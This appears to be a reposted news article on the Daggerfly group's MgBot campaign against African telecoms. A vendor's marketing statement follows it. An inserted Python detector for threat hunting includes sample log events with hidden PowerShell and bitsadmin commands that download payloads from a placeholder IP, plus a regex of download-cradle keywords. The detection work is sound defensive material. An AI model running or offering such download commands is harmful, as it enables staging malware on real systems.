Telecom service providers in Africa have been targeted by a new campaign orchestrated by a China-linked threat actor since at least November 2022.
The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, which the wider cybersecurity community also tracks as Bronze Highland and Evasive Panda.
The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software."
Daggerfly’s use of the MgBot loader (also known as BLame or MgmBot) was highlighted by Malwarebytes in July 2020 as part of phishing attacks targeting Indian government personnel and individuals in Hong Kong.
According to a profile published by Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot, as well as other tools such as Cobalt Strike, a legitimate adversary simulation framework, and an Android-based remote access trojan (RAT) called KsRemote.
The group is suspected of carrying out espionage activities against China’s domestic human rights and democracy defenders and neighboring nations since 2014.
Attack chains analyzed by Symantec show the use of living-off-the-land (LotL) tools such as BITSAdmin and PowerShell to retrieve next-stage payloads, including a legitimate AnyDesk executable and a credential-dumping utility.
The threat actor then sets up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which includes a wide range of plugins to collect browser data, log keystrokes, capture screenshots, record audio, and enumerate Active Directory services.
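The chain above (BITSAdmin or PowerShell fetching a payload, a new local account, AnyDesk running from a dropped location) is a good hunting target because every step lands in ordinary Windows process-creation (4688) and account-management (4720) telemetry. The detector below is an added example written for this page, not code from Symantec or from the threat actor's tooling; the event records are constructed samples, the field names (`host`, `time`, `event_id`, `image`, `cmdline`, `target_user`) are an assumed collector schema, and the "AnyDesk outside Program Files" heuristic is my own assumption about how an attacker-dropped copy differs from an IT-installed one. It flags each stage individually and then raises a higher-confidence alert when several distinct stages hit one host inside a time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs). Windows Security 4688 (process
# creation) and 4720 (user account created) events flattened to dicts; the
# field names are an assumed collector schema, not a Windows standard.
SAMPLE_EVENTS = [
    {"host": "tel-srv01", "time": "2022-11-14T09:02:11", "event_id": 4688,
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high "
                r"http://203.0.113.5/cr.dat C:\Users\Public\cr.dat"},
    {"host": "tel-srv01", "time": "2022-11-14T09:03:40", "event_id": 4688,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://203.0.113.5/AnyDesk.exe',"
                "'C:\\Users\\Public\\AnyDesk.exe')\""},
    {"host": "tel-srv01", "time": "2022-11-14T09:05:02", "event_id": 4720,
     "target_user": "svc_backup2"},
    {"host": "tel-srv01", "time": "2022-11-14T09:06:30", "event_id": 4688,
     "image": r"C:\Users\Public\AnyDesk.exe", "cmdline": "AnyDesk.exe --install"},
    # Benign control: IT staff launching AnyDesk from its installed location.
    {"host": "it-ws07", "time": "2022-11-14T10:00:00", "event_id": 4688,
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
]

# PowerShell download cradles commonly used to fetch a next-stage payload.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient",
    re.IGNORECASE)
# Assumption: a legitimately installed AnyDesk lives under Program Files.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


def is_bitsadmin_transfer(e):
    """bitsadmin.exe used with /transfer and a remote URL (LotL download)."""
    cmd = e.get("cmdline", "")
    return (e.get("event_id") == 4688
            and e.get("image", "").lower().endswith("\\bitsadmin.exe")
            and re.search(r"/transfer\b", cmd, re.IGNORECASE) is not None
            and re.search(r"https?://", cmd, re.IGNORECASE) is not None)


def is_powershell_download(e):
    """powershell.exe invoked with a download cradle on the command line."""
    return (e.get("event_id") == 4688
            and e.get("image", "").lower().endswith("\\powershell.exe")
            and DOWNLOAD_CRADLE.search(e.get("cmdline", "")) is not None)


def is_local_account_created(e):
    """Event 4720: a user account was created (persistence step)."""
    return e.get("event_id") == 4720


def is_anydesk_outside_program_files(e):
    """AnyDesk executing from a location other than its normal install path."""
    image = e.get("image", "").lower()
    return (e.get("event_id") == 4688
            and image.endswith("\\anydesk.exe")
            and not image.startswith(TRUSTED_DIRS))


RULES = {
    "bitsadmin_transfer": is_bitsadmin_transfer,
    "powershell_download": is_powershell_download,
    "local_account_created": is_local_account_created,
    "anydesk_outside_program_files": is_anydesk_outside_program_files,
}


def match_rules(events):
    """Return (host, timestamp, rule_name) for every event a rule matches."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((e["host"], datetime.fromisoformat(e["time"]), name))
    return hits


def correlate(hits, window=timedelta(hours=24), min_stages=3):
    """Map host -> sorted stage names when >= min_stages distinct rules fire
    on that host within `window`; single hits alone are left as low-severity."""
    by_host = defaultdict(list)
    for host, ts, name in hits:
        by_host[host].append((ts, name))
    alerts = {}
    for host, items in by_host.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            stages = {name for ts, name in items[i:] if ts - t0 <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts


if __name__ == "__main__":
    for host, stages in correlate(match_rules(SAMPLE_EVENTS)).items():
        print(f"CHAIN ALERT on {host}: {', '.join(stages)}")
```

Tune `window` and `min_stages` to the environment: the account-creation and AnyDesk rules will fire on legitimate IT activity in isolation, which is why the chain alert, not the individual hits, is what should page an analyst.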
“All of these capabilities would have allowed attackers to collect a significant amount of information from victim machines,” Symantec said. “The capabilities of these plugins also show that the primary goal of the attackers during this campaign was information gathering.”
The modular nature of MgBot means that operators actively maintain and update it to keep access to victims' environments.
The disclosure comes nearly a month after SentinelOne detailed a campaign called Tainted Love, active in the first quarter of 2023, targeting telecom providers in the Middle East. It was attributed to a Chinese cyberespionage group that shares overlaps with Gallium (aka Othorene).
Symantec also said it identified three additional victims of the same cluster of activity located in Asia and Africa. Two of the victims, which were breached in November 2022, are subsidiaries of a telecommunications company in the Middle East region.
“Telecom companies will always be a key target in intelligence-gathering campaigns because of the access they can provide to end-user communications,” Symantec said.
Ikaroa is deeply concerned by recent reports of a cyberattack campaign that has targeted telecom service providers in Africa. The intrusions have reached providers in several countries and are a serious threat to global cyber security.
The campaign has been attributed to the threat actor tracked as Daggerfly and relies on the MgBot malware framework to compromise hosts. The framework's plugins can be used to steal browser data, log keystrokes, capture screenshots and audio, and enumerate Active Directory, giving the attackers broad access to data and potentially to back-end processes.
At Ikaroa we are aware of the potential gravity of such an attack, and the damage and disruption that it can cause. Our team of experienced security and software engineers is actively monitoring the situation, and we can confirm that no Ikaroa customers were affected by the attack so far. Still, we advise all our partners and customers in Africa and other regions to take extra caution when assessing the security of their networks and digital assets.
It’s also important to note that this attack has shown us all the ever-growing importance of cyber security, as well as its complexity. Companies of all sizes need to have multiple layers of security in place, such as passwords, two-factor authentication and firewalls, in order to protect their customers and business.
Ikaroa specializes in providing software security solutions and supporting services for various industries, and we are now doubling our efforts to assist affected companies and prevent future attacks. By taking proactive measures and protecting our partners and customers, we strive to make progress in the fight against cybercrime and help to secure online connections in Africa and across the world.